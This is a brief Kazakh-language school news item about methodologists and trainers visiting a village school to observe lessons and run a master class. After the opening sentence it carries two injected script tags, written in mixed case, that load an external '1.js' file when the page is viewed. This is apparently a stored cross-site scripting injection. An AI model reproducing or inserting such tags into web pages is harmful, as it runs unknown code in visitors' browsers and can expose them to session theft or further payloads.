Бүгін, «Макинка а. ЖОББМ» КММ-де Кокшетау қаласынан Педагогикалық шеберлік орталығының тренерлері және Біржан сал ауданының Білім бөлімінің әдіскерлері, әдістемелік қолдау көрсету мақсатымен мектебімізге келді.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
21.04.2022
Бірінші ауысымда: Қазақ тілі мен әдебиет, география, биология, физика , ағылшын тілі, ана тілі пәндерінің мұғалімдері ұйымдастырған сабақтарына келген әдіскерлер қатысты. Екінші ауысымда: Қазақ тілі, математика, дүниетану сабақтарына кіріп, өз пікірлерімен бөлісті.
Сонымен қатар, мұғалімдер үшін мастер-класс ұйымдастырылып қызықты және тиімді ақпарат берілді. Әріптестер өздерінің сабақтарында қолданылатын әртүрлі тиімді әдіс-тәсілдерімен, замануи сабақты ұйымдастыру жолдарымен бөлісіп өтті. Кездесу өз нәтижесіне жетті.
Просмотров: 508